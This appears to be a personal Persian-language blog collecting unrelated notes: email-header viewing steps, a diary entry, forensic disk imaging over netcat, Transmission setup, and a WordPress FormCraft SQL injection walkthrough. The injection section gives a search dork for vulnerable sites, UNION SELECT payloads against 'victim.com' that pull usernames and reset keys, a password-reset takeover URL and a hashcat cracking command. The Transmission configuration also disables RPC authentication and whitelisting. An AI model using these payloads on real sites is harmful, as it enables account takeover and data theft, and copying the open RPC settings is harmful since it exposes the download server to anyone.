My Documents

نوشتارهای مندرج در این وبلاگ مستند سازی شخصی بوده و عواقب استفاده نابجا به عهده بازدیدکنندگان محترم می باشد.

My Documents

نوشتارهای مندرج در این وبلاگ مستند سازی شخصی بوده و عواقب استفاده نابجا به عهده بازدیدکنندگان محترم می باشد.

Email Header

Email Header


Extracting Email Headers

    Email header is the information contained in every mail message which is used by mail programs to provide the user with a summary of the origin and contents of each message.

Hotmail

  • Log into Hotmail.
  • Click on "Options" tab on the top navigation bar.
  • Click on the "Mail Display Settings" link.
  • Change the "Message Headers" option to "Full".
  • Click the "OK" button.

Yahoo Mail

  • Log into your Yahoo! Mail account.
  • Click the "Mail Options" link on the left-hand navigation bar.
  • Click the "General Preferences" link on the right.
  • Locate the Show Headers heading and select "All."
  • Click the "Save" button to put your new settings into effect.

Gmail

  • Log into your Gmail or Googlemail Account.
  • Open the Email whose headers you want to view.
  • You will see Reply at the top right of the message pane.
  • You will see a little arrow pointing down next to Reply. Click on this down arrow next to Reply.
  • A drop down menu will open up. Select Show original in this menu.
  • The full headers will now appear in a new window.

Eudora

  • Click the button BLAH BLAH BLAH in the ToolBar.

Outlook Express 4,5,6 and XP for Windows

  • Select the message.
  • Click on File menu.
  • Select Properties.
  • Click on Details tab.

Outlook 2000, XP

  • Right click on the message without opening it.
  • Select Options, then Full Headers.

Microsoft Outlook 98

  • Open the message and select View, then Options from the drop-down menus.
  • Near the bottom of the screen there is a section titled INTERNET HEADERS.
  • Copy the header.

IncrediMail

  • Select File > Properties and then the Details tab.

Rediff Mail

  • Click 'Folder Options'.

Microsoft Entourage(Office X for Mac)

  • Select the message in the Inbox.
  • Go to View > Source.
  • The new window will contain full headers and message text.
  • Alternately, go to Edit > Preferences > Mail and News.
  • Under the View tab, there is a checkbox for Show Internet Headers.

kmail (KDE Desktop)

  • Select Message.
  • View Source.
  • Copy the text from the "Message as Plain Text" window.

kmail (KDE Desktop)

  • Select Message.
  • View Source.
  • Copy the text from the "Message as Plain Text" window.

Pegasus Mail

  • Right click the message, and select Message headers...

Netscape Messenger

  • Windows users, simply press Ctrl-U (meta-U in unix, ?-U on Macintosh).
  • A new window will open with the full message including the complete header.

Netscape Webmail

    While viewing the message, click on the yellow triangle to the right of the brief message headers. This will display the full headers along with the message body.

Operamail

  • Choose Options and enable [x] Show Message Headers in Body of Message.

Outlook Express for Macintosh

  • Select the email.
  • From the View menu, choose Source.
  • Email with full headers will be displayed.

Outlook Web Access

  • Left click on the letter you want to open and click on properties.
  • When that opens click on the Details tab.
  • Then on message source.
  • This will open the email with the full headers.

Pine

  • You must configure Pine to allow showing message headers. You may skip steps 1-3 below if you have performed this configuration.
  • From the main Pine menu, type S for Setup, then C for Config.
  • Use the space bar and down arrow to scroll until you reach the option [ ] enable-full-header-cmd, then type X in the box to toggle the option on.
  • Type E to exit Config, and Y to save changes.
  • The next time you read a message, type H and the full headers will be displayed at the top of the message. Type H again to hide the headers.

Pronto Mail (GTK/unix)

  • Click "Message" then "View Source".

Exchange

  • Open the message.
  • Choose File then Properties then Internet.
  • The header will be visible and will be highlighted.
  • Simply right click and copy it.
  • In some versions of Exchange, go to the File Menu > Properties > Details > Message Source.

Bat!

    From The Bat email software:
  • Message > SaveAs > Save as Type - I.
  • Select Unix Mailboxes [*.mbx].
  • Open the file in your preferred editor, then simply copy from there.
    For The Bat! v1.53b :
  • Select the message.
  • Click on the "Messages" menu.
  • Select "View Source".
  • Alternatively, you may push F9 instead of the last two steps.

AOL Mail

    If the email is sent from anywhere OTHER then AOL, and you are receiving it in AOL, then open the email you want to trace, or have your client open the email, and look for the link Details. This link is usually just below the To:email in the email message. If the email is sent from an AOL user to another AOL user then our Reverse AOL Screenname search can get you the sender's information.

XtraMail

  • Log into XtraMail
  • Click on "Options" in the Left-hand navigation bar.
  • Click the "Display" button.
  • Change the "Message Headers" option to "Full".
  • Click the "OK" button.

دیدی این به درد خورد؟

اول اینکه اینجا که پست گذاشتم به درد خورد. از فلان جا با آژانس و سلام و صلوات اومدن دنبال ما که بیا به کارمون رسیدگی کن و من هم رفتم اونجا کل کارمنداشون پیر و جوون و دختر و پسر ریختن دور من ... گه گیجه گرفته بودم. یه دفه یادم اومد اینجا قبلا مستند شده و ازینجا نگاه کردم و خلاصه جمع شد.


کلا یه ماهه 9 صبح به بعد اصلا چیزی نمیفهمم.


دوم اینکه این کودن میگفت خودتون رو سانسور نکنید و ازین حرفا ... ما هم اومدیم هم مستندسازی کنیم اینجا و هم خودسانسوری نکنیم و برای درج سوابق هر چی نابدترمون رو هم اینجا بنویسیم ولی نمیشه که راستش.


کلا من تو وایبر راحتترم.


سوم اینکه از یه روز قبل از شب نوزدهم (شب چندم؟) تا یه روز بعد از شب بیست و سوم دو بار دو تا چیز دیدم. حالا چه ربطی به این سه تا شب داره نمیدونم. چون که کی گفته شب قدر همین سه تاست ... اصلا گذشته یا نه؟ بعضیها هم میگن بیست و هفتمه و بعضی ها هم میگن یکی از ده تا شب آخره و اصلا شاید خدا خواست تو محرم برگزار کنه ...


کلا ولی خوشم نمیاد تا شب بیست و سوم تموم میشه خیالتون راحت میشه.


چهارم اینکه از همون چیز اول به اینور شبا تا صبح خوابم نمیبره به جز 5 تا 6 صبح و بعضی وقتها 7 تا 8:30 بعد از ظهر ... یعنی 24 ساعت دو سه ساعت ... اصلا حالم خوب نیستا


کلا واسه همینه که کسی رو آدم حساب نمیکنه دیگه. میشینن اتفاقات رو یه جوری بعدش تعبیر میکنن که انالحق و بارمو بستم و رفتم واسه خودمو و اینا ...

کلرودیازپوکساید

برتری روابط کشف شده لیدوکایین که ماده بی حسی دندانپزشک هاست و دندون و خیلی چیزای دیگه و همسو بودن با هژمونی غرب و دکتر خیلی حس خوبی دارم الان.

همچنین به واسطه خراب شدن سلطه فطرت انسانی تتار اگرچه جهان را خراب کرد به جنگ و لب خرابه گنج تو دارد چرا شود دلتنگ؟ قوام عالم محدود چون ز بی حدی است، مگیر عیب اگر من برون ز حد گردم.

Cosmos: A SpaceTime Odyssey

عجب چیزی است این کازموس !

IMDB Link




از اینجا می تونید دانلود کنید. اگر خواستید از روی سرور پاکش نکنم، کامنت بذارید.

فعلا یک هفته از الان بمونه.

Duplicate and Image through NETWORK

برای تهیه ایمیج فارنزیکی از طریق شبکه بین مبدا و مقصدی که ping یکدیگر را دارند، از روشی که در ذیل توضیح داده شده است استفاده می کنیم.

ترجیحا مقصد باید یک سیستم عامل ویندوزی باشد. برای شروع هر دو سیستم های عامل مبدا و مقصد باید دستورات dd و nc را داشته باشند. در لینوکس این دو دستور به صورت built-in در bash موجود هستند.

نسخه ویندوزی این دو دستور را از لینک های مقابل می تونید دریافت کنید : 

 

           dd                nc 


ابتدا یک پورت بلا استفاده که بهتر است از کلاس پورت های رجیستر شده نباشد را در مقصد به حالت listen در می آوریم و آدرس محلی که می خواهیم ایمیج ذخیره شود را در دستور وارد می نماییم.


nc -l -p 9999 | dd of=E:\image.dd


سوئیچ l برای listen کردن پورت و سوئیچ p برای تعیین پورت مورد نظر ما که اینجا به عنوان مثال 9999 هست، کاربرد دارد.

علامت پایپ که به صورت | نمایش داده می شود، هر گاه در دستوری به کار برود، بدین معناست که خروجی را روی مونیتور پرینت نکن، و به دستور بعد از پایپ بده. دستور بعد از علامت پایپ هم بدین معناست که خروجی که از پورت 9999 دریافت شده را در آدرس تعیین شده و در فایل image.dd ذخیره کن.


در مرحله بعد باید در سیستم عامل مبدا مشخص کنیم که چه داده ای به سمت پورت 9999 ماشین مقصد فرستاده شود.


dd if=/dev/sda | nc 192.168.1.10 9999



دستور بالا مثالی است که مبدا ما یک سرور لینوکسی با IP:192.168.1.10 است و هدف ما اخذ ایمیج از هارد فیزیکی /dev/sda/ است.

به محض اجرای دستور دوم عملیات اخذ ایمیج شروع می شود.

web shell




=================
لینک به فایل تکست
=================


Wordpress SQL Injection

dork=inurl:/wp-content/plugins/formcraft




========================================

http://victim.com/wp-content/plugins/formcraft/form.php?id=1 union select 1,2,3,4,5,6,7,8,9,10,11


http://victim.com/wp-content/plugins/formcraft/form.php?id=1 union select 1,2,3,user(),5,6,7,8,9,10,11


http://victim.com/wp-content/plugins/formcraft/form.php?id=1 union select 1,2,3,group_concat(user_login),5,6,7,8,9,10,11 from wp_users where id=1


========================================


http://victim.com/wp-login.php?action=lostpassword


must use $user_login


========================================


http://victim.com/wp-content/plugins/formcraft/form.php?id=1 union select 1,2,3,group_concat(user_activation_key),5,6,7,8,9,10,11 from wp_users where id=1


========================================

http://victim.com/wp-login.php?action=rp&key=$user_activation_key&login=$user_login


must use $user_activation_key and $user_login or just get the password and use hashcat and crack it




C:\hashcat>hashcat-cli64.exe -a 3 --pw-min=20 --pw-max=20 -m 400 -n 2 -c 64 hash2crack.txt -1 ?l?u?d ?l?l?l?l?l?l?l?l?l?l?l?l?l?l?l?l?l?l?l?l



Transmission


sudo apt-get install python-software-properties



sudo add-apt-repository ppa:transmissionbt/ppa


sudo apt-get update



sudo apt-get install transmission-cli transmission-common transmission-daemon



mkdir ~/Downloads
mkdir ~/Downloads/Completed
mkdir ~/Downloads/Incomplete
mkdir ~/Downloads/Torrents



sudo usermod -a -G debian-transmission username
sudo chgrp -R debian-transmission /home/username/Downloads
sudo chmod -R 775 /home/username/Downloads

Replace the bold “username” sections with the username of your Ubuntu user that will be accessing the files and folders





sudo /etc/init.d/transmission-daemon stop

Now we want to edit our configuration file

sudo nano /etc/transmission-daemon/settings.json

That’s going to bring up the big configuration file. I’m only going to give you the settings I tweaked, however you can have a look throughout the entire configuration and tweak whatever you’d like

“download-dir”: “/home/username/Downloads/Complete”,
“incomplete-dir”: “/home/username/Downloads/Incomplete”,
“incomplete-dir-enabled”: true,
“rpc-authentication-required”: false,
“rpc-whitelist-enabled”: false,

Once you’ve tweaked those settings, add this to the very end of the configuration file (before the ending “}” bracket, but also keep in mind that you will need to change the “utp-enabled” line to have a comma “,” at the end of it

“watch-dir”: “/home/username/Downloads/Torrents”,
“watch-dir-enabled”: true

Once you have finished editing your configurations, start the daemon back up

sudo /etc/init.d/transmission-daemon start

That should do it! Now all you need to do is save that file by issuing a CTRL+X to Nano and then saving when it prompts you. After you’ve saved the file, reload (DO NOT restart) your Transmission server

sudo /etc/init.d/transmission-daemon reload




Default username and password is : transmission
if you need it